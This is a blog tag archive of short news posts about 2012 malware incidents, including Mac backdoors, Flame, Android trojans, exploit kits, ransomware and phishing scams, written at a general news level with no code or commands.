Tag Archives: malware

Jul 05

OSX continues to be exploited

Posted on by

Once again, Apple’s OS X is being confronted with a security risk. The latest backdoor has been discovered by Russian security firm Kaspersky Labs and is being used as part of a Advanced Persistent Threat campaign. This is just the latest in a series of security risks present in the Mac OS X operating system.

Kaspersky researchers found that Uyghur activists in China were being targeted by hackers. These hackers sent e-mails with a compromised attachment that was in the form of a JPEG. The code hidden inside the JPEG was a new form of the MaControl backdoor and is compatible with both the PowerPC and i386 Mac variants.

The researchers found that the Command and Control server that the malware was reporting back to was located in China. This suggests that it could be the government trying to keep tabs on these activists. For years, users believed that Mac OS X was safer than Windows. However, with all of these recent outbreaks, people are starting to realize this is not the case.

It had seemed safer because not many hackers targeted Macs due to their low market penetration. Apple has now realized the times and taken down a comment from its website that claimed they weren’t susceptible to the same malware that Windows PCs are. Clearly, they are no longer sure this is the case.

Most recently, Kaspersky Lab researchers found that cyberthreats targeting the Mac OS X platform have been used as part of a comprehensive campaign targeting Uyghur activists–apparently presumed to be using Macs–by sending customized e-mails with attached ZIP files exploiting a malicious Mac OS X backdoor.

Like untold threats targeting Windows, the infected ZIP file is delivered as a phishing attack leveraging social engineering techniques, enticing victims with a JPEG photo that masks the malware.
The Mac OS X attack appears to be a new threat– detected as the most recent variant of the MaControl backdoor Trojan, which supports both i386 and PowerPC Macs. Once it gains entry, the Trojan installs itself on the Mac and immediately connects to its command and control center—which appears to be located in China–for instruction. The backdoor then has the ability to list and transfer files, as well as run commands on the victim’s Mac at the discretion of the malware’s operators.

The new MaControl variant is the latest in a string of recent APT-driven attacks this year targeting the Mac OS X platform. In April, Kaspersky Lab researchers detected an active APT campaign, so called SabPub, which targeted Mac OS X by exploiting a MS Office vulnerability running on the platform. Once the Trojan was installed on a victim Mac OS X, it could then take screenshots of the user’s current session and execute commands on the infected computer.

Prior to that, the Flashflake Trojan ran rampant on users’ Macs, creating a botnet comprised of more than 700,000 infected computers.

While Mac threats hasn’t yet reached the same heights as their Windows counterparts, the numbers are on a steady incline and will continue to grow, thanks in large part to a rising Mac OS X market share.

That said, the barrage of new Mac threats could open up new opportunities for security partners with tried and true mechanisms long-deployed on Windows environments. For one, the rising tide of Mac threats could easily pave the way for channel partners to add Mac security products and mechanisms to their portfolio.

Also, unlike previous years, the highly publicized spate of Mac threats will allow partners to simply start conversations with their customers in regards to securing their Mac environments.

Historically, with market share in the single digits, the Mac OS X has not been a highly lucrative target for cyber criminals. As such, Macs became known as the “secure” platform, lulling users into a false sense of security and making them largely resistant to any external security product or best practice.

But that might be changing. As threats targeting the Mac platform continue to emerge, many users will have to play “catch-up,” with everything from security best practices and awareness, to products and management for Mac environments.

Those knowledge gaps leave potential windows of opportunity for the channel, enabling partners to essentially go back to square one with basic security consulting services, and standard security software dedicated to the Mac OS X platform once thought to be immune to threats.

 

May 29

Stuxnet type malware discovered in Middle East

Posted on by

Researchers have discovered what they say is the most sophisticated malware ever discovered running rampant in the Middle East. First revealed by Kaspersky Lab, Flame is several times larger than Stuxnet, and appears to have been targeted at Iran’s oil ministry and main oil export terminal.

Flame is a backdoor Trojan with worm-like features that allow it to replicate in a local network and on removable media on command. Once a machine’s infected, it starts sniffing network traffic, taking screenshots, intercepting the keyboard and even recording audio conversations.

It’s a huge package of modules, comprising almost 20 MB in size when fully deployed.

What’s most astonishing is that Kaspersky believes that the Worm.Win32.Flame virus has been out there undetected for over two years.

Among other things, it can use a computer’s microphone to record conversations, take screenshots of particular applications when in use, record keystrokes, sniff network traffic and communicate with nearby Bluetooth devices.

One of the toolkit’s first versions was likely created in 2010 and its functionality was later extended by leveraging its modular architecture, said Vitaly Kamluk, chief malware expert at Kaspersky Lab.

Flame is much bigger than both Duqu and Stuxnet, which at around 500KB in size were already considered large by security experts. The size of all Flame components combined adds up to over 20MB and one file in particular measures over 6MB alone, Kamluk said.

Another interesting aspect of the threat is that some parts of Flame were written in LUA, a programming language that’s highly uncommon for malware development. LUA is often used in the computer gaming industry, but Kaspersky Lab hasn’t seen any malware samples before Flame that were written in the language, Kamluk said.

Flame spreads to other computers by copying itself to portable USB devices and also by exploiting a now-patched Microsoft Windows printer vulnerability that was also leveraged by Stuxnet.

Sponsored by: 1 to 1 Risk Control Oklahoma City IT and Cybersecurity Consulting

May 18

Facebook and Adndroid top malware targets

Posted on by

Android plagued with malware

Android smartphones rock, but whether you use Avast, Lookout, the new Sophos, or another freebie antivirus/security app, you better lock and load to protect your Android before you become a victim and a stat.

Android, once dubbed a “cyber menace,” is too popular, too juicy and potentially too lucrative of a target for malware writers to ignore. In fact, a new F-Secure report suggests malware writers are getting craftier by creating trojanized apps that can defeat anti-virus detection. F-Secure released its latest mobile threat report [PDF] concerning the first quarter of 2012 and Android malware has grown exponentially. Since a year ago, the number of new malware variants have quadrupled and the number of malicious Android application package files (APKs) had a “staggering” increase of “139 to 3063 counts.”

Facebook target of malware campaign

A new fraud campaign aims to separate users of Facebook, Google Mail, Hotmail, and Yahoo from their debit card data.
We’ve recently discovered a series of attacks being carried out by a P2P variant of the Zeus platform against some of the Internet’s leading online services and websites.

The Facebook scam offers people a 20% discount if they link their Visa or MasterCard details to their Facebook account. “The scam claims that after registering their card information, the victim will earn cash back when they purchase Facebook points,” said Klein. A fake Web form then requests that the user enter their debit card number, its expiration date, as well as their security code and PIN.

In the Gmail, Hotmail, and Yahoo variations, the scam “offers an allegedly new way of authenticating to the 3D Secure service offered by the Verified by Visa and MasterCard SecureCode programs,” said Klein. In particular, the scam suggests that Google and Yahoo users can tie the 3D Secure password issued by their bank to, respectively, their Google Checkout and Yahoo Checkout accounts. It then requests the person’s debit card number, expiration date, security code, and 3D Secure PIN code. For Hotmail users, attackers have tweaked the language slightly to suggest that without the 3D Secure code being entered, users won’t be able to use Hotmail to make any purchases.

 

Sponsored by osxantimalware.com – antivirus for mac

May 14

Malware threats growing online and getting tougher to detect

Posted on by

New Malware Campaign

A new malware campaign is making the rounds of the Internet, taking advantage of curiosity and sympathy surrounding the passing of Beastie Boys’ Adam Yauch (a.k.a. MCA).

Trend Micro said the attack appeared to target specific recipients, using a news item about Yauch’s death as a social engineering lure.

“We have found an email sample that leverages Yauch’s death to entice users to download and open the malicious attachment. The message appears as a news item from a non-profit organization that features the late musician’s recent passing,” it said.

It said the email contains a .DOC file attachment, which is supposed to contain the complete story.

But users who download and open the .DOC attachment are actually executing a malware detected by Trend Micro as TROJ_DROPPR.JET.

“This Trojan file drops another malicious file, detected as particular TROJ_SWYSYN.SME, that connects to possibly malicious URLs,” Trend Micro said.
Online ads serving malware

One of the sneakiest scams among cybercrooks these days involves malicious advertisements that can infect a computer with nasty software even if a person merely happens onto a website where the ads appear and doesn’t click on them.
The sinister ad software, called “malvertisements,” which can steal bank account passwords, disable computers or cause other mischief, have claimed millions of victims. And some experts fear worse problems may be ahead.

“What we are seeing today is the canary in the mine,” said Craig Spiezle, executive director of the nonprofit Online Trust Alliance, which seeks to bolster consumer confidence in cyberspace. “It’s an early warning and if we don’t do more to secure the ad infrastructure, we run the risk of having much broader distribution of malware than we have today.”

Phony Flash Player

Adobe Flash Player users beware: A website that promises visitors a free copy of the download for all versions of Android is reportedly planting malware on smartphones running Google’s mobile operating system.

The infected web page used to distribute the malware was discovered in a number of Russian domains, wrote Karla Agregado, a fraud analyst with Trend Micro, in a recent company blog. A similar tactic emerged last month to infect Android phones with bogus copies of Angry Birds and Instagram.

When a visitor clicks the download button at the infected site, Agregado explained, a connection is made to another site that, without the guest’s knowledge, sends a malicious APK file to the mobile web surfer’s smartphone.

Once on the phone, the malware starts to secretly send text messages to premium numbers. This scam is a popular one among cyber criminals targeting Android phones.

Amnesty International targeted by malware

People visiting Amnesty.org.uk on Wednesday and Thursday were exposed to malicious code that exploited a now-patched vulnerability in Oracle’s Java software framework, according to a blog post published Friday by Websense. End users who hadn’t yet applied the patch were infected with Gh0stRat, a family of malware that siphons sensitive data from victims’ machines and can also operate Web cams and microphones in real time. The trojan came to light in 2009 when researchers reported that it infiltrated government and private offices in 103 countries. That included computers belonging to the Dalai Lama.

The Java vulnerability targeted on the Amnesty International site has been used in the past to install malware on computers running both Microsoft Windows and Apple’s OS X. Recently, similar espionage attacks have migrated to OS X, and the Flashback malware attack believed to have infected more than 500,000 Macs targeted the same bug. Based on the Websense post, however, it appears this week’s attacks infected only Windows users.

May 11

FBI warns about hotels installing malware

Posted on by

The FBI warned people traveling abroad that attackers are targeting users on hotel networks by tricking them into installing malware under the guise of software updates. The agency’s Internet Crime Complaint Center says any government, business or academic personnel traveling abroad should be especially wary.

The FBI issued an advisory this week alerting international travelers about attempts to infect their computers with malware when they log on to hotel networks.

In an intelligence note from the FBI’s Internet Crime Complaint Center (IC3), the agency warned that attackers have been targeting travelers abroad when they use the Internet connection in their hotel rooms. According to the FBI, when the victims attempt to set up the hotel room Internet connection, they were presented with a pop-up window notifying them to update a “widely-used software product.”

“If the user clicked to accept and install the update, malicious software was installed on the laptop,” according to IC3. “The pop-up window appeared to be offering a routine update to a legitimate software product for which updates are frequently available.”

The FBI recommends checking the author or digital certificate of any prompted update to see if it corresponds to the software vendor, and advises travelers update the software on their laptops immediately before travelling.

May 08

A week of malware, exploits, ransomware and cybersecrity

Posted on by

New Java EXploit Kit:

Researchers from SpiderLabs recently spotted. Meet the RedKit, a private web malware exploitation kit, exploiting popular and already patched Java vulnerabilities, next to having an embedded QA (quality assurance) element embedded into it.

What’s so special about RedKit, and how does it differentiate itself from the rest of the exploit kits currently observed in the wild? Next to exploiting CVE-2010-0188 and CVE-2012-0507, the cybercriminals behind the kit also offer legitimate traffic that will be later on converted to malware-infected hosts as a managed service.

Malware already taking advantage of Olympics:

Security researchers from TrendMicro have intercepted a currently circulating 2012 Olympics themed emails containing malicious attachments.

The cybercriminals behind the campaign are enticing end and corporate users into opening the malicious Microsoft Office (.doc) attachment, which upon execution will attempt to exploit CVE-2010-3333 (RTF Stack Buffer Overflow Vulnerability) and will later on drop a backdoor on the infected PCs.

How safe are QR Codes?

The codes have proved to be popular with marketers, even if they are not well understood by many mobile users: a recent survey by analyst firm Russell Herder suggested that more than half of all respondents — including more than 80 per cent of respondents in the 18-24 bracket — had seen QR codes, while around 16 per cent of all respondents had actually scanned one.

Tellingly, however, one out of five respondents had no idea what a QR code is. That’s around the same percentage — 22 per cent — of Fortune 50 companies that are experimenting with QR codes in their marketing, and not entirely without success: a separate study by Comscore suggested that 14 million U.S. residents scanned QR codes in June 2011 alone

While marketers wrestle with building demand for the codes, consumers may unwittingly be wrestling with something far more threatening: what if that barcode led your smartphone to a malware-infected Web site? And what if that malware was optimized to target Apple’s iOS, Google’s Android, or other mobile operating systems with a Trojan that would run in the background and send passwords to its masters?

Religiuos sites found to contain more malware than porn sites:
Religious sites may pose a much bigger cyber-threat to surfers than adult or pornographic sites, according to a study by Symantec, a computer security vendor.

Symantec said its Internet Security Threat Report’s 2011 trends published in April showed that, “Religious and ideological sites were found to have triple the average number of threats per infected site than adult/pornographic sites.”

Moreover, it said “We hypothesize that this is because pornographic website owners already make money from the Internet and, as a result, have a vested interest in keeping their sites malware-free – it’s not good for repeat business.”

New ransomware:

Security researchers from Trusteer have intercepted a ransomware variant being pushed using the Citadel crimeware platform.

The ransomware is pushed using drive-by malware attacks. Upon execution the following activities take place:

Once installed on the victim’s computer, the ransomware locks-up the targeted machine and displays a warning message notifying the user that they have violated United States Federal Law. The web inject screen (below) claims the IP address belonging to the infected machine was identified by the Computer Crime & Intellectual Property Section as having visited websites that contain child pornography and other illegal content.In order to unlock their computer, the victim is instructed to pay a $100 fine to the US Department of Justice using prepaid money card services. The payment service options presented to the victim are based on the geographic location of their IP address. For example, users with US IP addresses must pay using MoneyPak or Paysafecard.

What’s particularly interesting about this campaign, is that it’s a decent example of campaign optimization performed on behalf of the cybercriminals behind it, adding multiple monetization vectors in it. Not only will they earn revenue out of the ransomware variant, they will also be able to successfully hijack online banking transactions thanks to the Citadel crimeware that will also remain active on the system.

A campaign of “ransomware” is locking people out of their computers unless they pony up the right amount of money.
Spotted by security blog abuse.ch, the malware taps into an exploit kit known as “Blackhole.” Sold underground, Blackhole is used by criminals to infect computers through security holes in the browser or third-party plug-ins, such as Java and Adobe Reader.
If the version of Java, for example, is not up to date with the latest patches, the downloaded file will exploit the software’s weakness by downloading the Trojan to the PC and then running it. Once the PC is infected, the user will receive a message on the screen saying that the computer has been locked for illegally downloading pirated music.
The message aimed toward those in the U.K. further says that “to unlock your computer and to avoid other legal consequences, your are obligated to pay a release fee of 50 pounds,” around $80. The directions instruct the user to submit payment using an online payment system called Paysafecard. The message itself tries to look official with a logo of the Metropolitan Police at the top.
The malware has so far been targeting users in the U.K., Germany, France, Switzerland, Austria, and the Netherlands. The criminal behind this campaign appears to speak German, according to abuse.ch, since the local URLs used in this scam are all in German.
But the messages are, of course, written in the native language of the intended victims of each country, even going so far as to tell them where and how to obtain Paysafecard locally.
The ransomware carries a further payload in the form of a Trojan called Aldi Bot, which steals banking information, abuse.ch added.

 

May 03

Hacked Websites Deliver Drive-by Android Malware

Posted on by

Cyber criminals often put drive-by download malware on websites they have hacked in order to quickly infect visitors’ PCs. For the first time though, hacked websites with Android drive-by download malware have been discovered.

A new Trojan, called NotCompatible, appears to serve as a simple TCP relay while posing as a system update called named “Update.apk.” It does not currently seem to cause any direct harm to a target Android device, but could potentially be used to gain access to private networks by turning an infected smartphone into a proxy.

IT administrators should note that a device infected with NotCompatible could potentially be used to infiltrate normally protected information or systems, such as those maintained by enterprises or governments. Security firm Lookout (via Reddit) describes how when a user visits a compromised website from an Android device, the malicious app is automatically downloaded.

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system.

The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn’t have up-to-date patches.

The trojan is embedded into iframes of compromised websites, and automatically downloads itself if the page is visited by an Android device. Lookout has dubbed the trojan “NotCompatible”, although the downloaded file is simply called “Update.apk”. Right now there are only a handful of sites that have been compromised with the APK, so Lookout predicts that the total fallout will be low.

The hacked websites have an hidden iframe, which is a window that brings other content into the target Web site, at the bottom of a page. The iframe causes the browser to pull content from two other malicious websites hosting NotCompatible. If a PC accesses either of those websites, a “not found” error is displayed, Lookout said.

Apr 23

Android Malware disguised as Instagram App

Posted on by

Cashing in on the popularity surrounding popular photo-sharing application Instagram, a number of fake versions of the app are doing the rounds online.

Cyber criminals have created fake versions of the Instagram Android app, designed to earn money from unsuspecting users.
When users download the Instagram app from anywhere other than the official Google Play store, or directly from the Instagram Web site, they are running the risk of infecting their smartphones with malware.

One example is a Russian Web site that mimics the look of the Instagram site, and offers users a free download.
The resulting download is a malicious app that seems to be relying on the sending of background SMS messages to earn its creators revenue.

Recently, users looking to download Angry Birds Space were also being targeted. Other popular smartphone apps being used in the scheme are Fruit Ninja, Temple Run and Talking Tom Cat.

Apr 22

Malware spreading via tweets

Posted on by

Fake anti-virus software has been around for a while, and the reason is — the attackers who spread it convince you your computer is in trouble, and they’ve got the solution. Now, these attackers are using Twitter to reach victims, and delivering malware in the process.

If you see tweets promising “proven,” “trusted” or “excellent anti-virus software, especially tweets ending in .TK or .tw1.su, do not click on them. The posts have been spreading around Twitter for days and are currently still active, take those who click the links to sites hosting the BlackHole exploit kit, a malicious Russian Web app that in turn redirects victims to malware sites.

Users who click on the fake anti-virus links receive an alert that their computer is infected, and the fake anti-virus program will perform a scan of their system. The scan, of course, reports that it detects a number of Trojans on the victim’s computer, and then prompts them to install fake anti-malware software.

So far, scammers have compromised 453 Twitter accounts, and used them to spam these malicious links over 4,200 times. Even worse, the malware that poses as anti-malware updates itself to avoid detection. The security company GFI Labs identified a rogue anti-virus Trojan, “Trojan.Win32.Fakeav.tri,” that updates every three to six hours. Another Trojan, posing as a security program called “Windows Antivirus Patch,” operates on a 24-hour update schedule.

Apr 22

FBI Closing down the Internet on infected systems

Posted on by

The FBI has warned that thousands of web users worldwide could lose Internet access after a hacker’s adverting scam infected computers.
The problem started after international hackers ran an online advertising scam to get control of infected computers around the world.

In response, the FBI had set up a safety net months ago using government computers to prevent Internet disruptions for those infected users. However, that system is to be shutdown.

It is estimated that hackers have targeted a network of about 570,000 computers.
They took advantage of vulnerabilities in the Microsoft Windows operating system to install malicious software in the victims computers. This turned off antivirus updates and most victims don’t even know their computers have been infected, although the software has probably slowed their web surfing and disabled their antivirus software.

The FBI is encouraging users to visit a website run by its security partner that will inform them whether they’re infected and explain how to fix the problem. After July 9, infected users will not be able to connect to the Internet due to DNS failures.

The FBI believes that on the day of the arrests, at least 568,000 unique Internet addresses were using the servers. 85,000 of which are US based.

Other countries have victims with more than 20,000 each, including Italy, India, England and Germany.

According to the FBI, the hackers have earned at least 14 million dollars in the scam. (ANI)